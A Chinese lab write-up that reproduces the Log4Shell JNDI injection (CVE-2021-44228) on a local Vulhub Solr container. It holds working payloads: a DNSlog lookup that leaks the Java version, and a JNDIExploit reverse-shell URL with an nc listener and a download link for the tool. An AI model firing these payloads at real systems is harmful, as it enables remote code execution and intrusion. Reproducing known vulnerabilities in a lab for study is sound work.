log4j-CVE-2021-44228-vulhub复现

简介: log4j-CVE-2021-44228-vulhub复现

01漏洞描述


Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。

参考地址:


https://github.com/vulhub/vulhub


本次漏洞复现也是基于Vulhub


微信图片_20230517200135.gif

02漏洞环境搭建


docker-compose up -d --build



访问http://127.0.0.1:8983/solr/#/




微信图片_20230517200135.gif

03Dnslog测试


在DNSlog平台请求一个dns域名:3j7r1s.dnslog.cn


构造:

${jndi:dns://${sys:java.version}.example.com}是利用JNDI发送DNS请求的Payload:


http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.3a5h27.dnslog.cn}

直接访问:


http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.3j7r1s.dnslog.cn}



此时直接得到版本信息:1.8.0



或者是请求:


http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://cd9097fd.dns.1433.eu.org}



04反弹shell


反弹shell需要使用JNDIExploit.v1.2,可以从下面百度云直接下载:

详细的信息可以参考上一篇文章


https://pan.baidu.com/s/1lxXt-27-i7I_dOUACphVtQ 提取码: nkc5


网络拓扑:

攻击机:10.211.55.23  

靶机:10.211.55.2

中转机:10.211.55.3

中转机java版本:1.8.0_172


首先在中转机上使用JNDIExploit-1.2-SNAPSHOT.jar文件使用java启动,命令如下:


java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.211.55.3

 其中:10.211.55.3为中转机的ip地址



然后在攻击机上开启监听:nc -lvvp 6666


此时构造如下命令:


http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://10.211.55.3:1389/Basic/ReverseShell/10.211.55.23/6666}

其中:

  • http://127.0.0.1:8983为靶机的地址
  • 10.211.55.3为中转机地址
  • 10.211.55.23为Kali攻击机ip地址,此时要反弹shell

更多用法可以参考:


https://github.com/zzwlpx/JNDIExploit


直接执行之后,shell就弹回来了



此时在中转机器上:



成功!


清除环境:docker-compose down




05 注 意 事 项


中转机的java版本:1.8.0_172


相关文章
|
11月前
|
安全 Java
Log4J漏洞本地快速复现
Log4J漏洞本地快速复现
228 0
|
11月前
|
安全 Java Shell
一次简单的log4j漏洞测试
一次简单的log4j漏洞测试
387 0
|
11月前
|
安全 Java fastjson
Log4J 漏洞复现+漏洞靶场
Log4J 漏洞复现+漏洞靶场
|
11月前
|
安全 Java fastjson
Log4j2漏洞复现&原理&补丁绕过
Log4j2漏洞复现&原理&补丁绕过
|
JSON 监控 Kubernetes
如何使用 Deepfence 检测和修复 Log4j2 漏洞
log4j2 漏洞(如 OpenSSL Heartbleed 和 Apache Struts 漏洞之前出现的漏洞)向互联网企业发出了深刻的提醒,一旦补丁可用,通过重新部署应用程序来响应漏洞并不够,您还必须能够发现在您的生产平台中实时利用漏洞并阻止它们。在本教程中,我们将向您展示如何使用 Deepfence ThreatMapper 和 ThreatStryker 来帮助您做到这一点。
120 0
|
域名解析 安全 Java
浅谈Log4j2之2.15.0版本RCE(二)
浅谈Log4j2之2.15.0版本RCE
125 0
浅谈Log4j2之2.15.0版本RCE(二)
|
域名解析 安全 网络协议
浅谈Log4j2之2.15.0版本RCE(一)
浅谈Log4j2之2.15.0版本RCE
238 0
浅谈Log4j2之2.15.0版本RCE(一)
|
XML 安全 应用服务中间件
|
云安全 安全 druid
Log4j2_RCE漏洞复现
Log4j2_RCE漏洞复现
158 0
|
自然语言处理 安全 Shell
GitLab 远程命令执行漏洞复现(CVE-2021-22205)
GitLab 远程命令执行漏洞复现(CVE-2021-22205)
456 0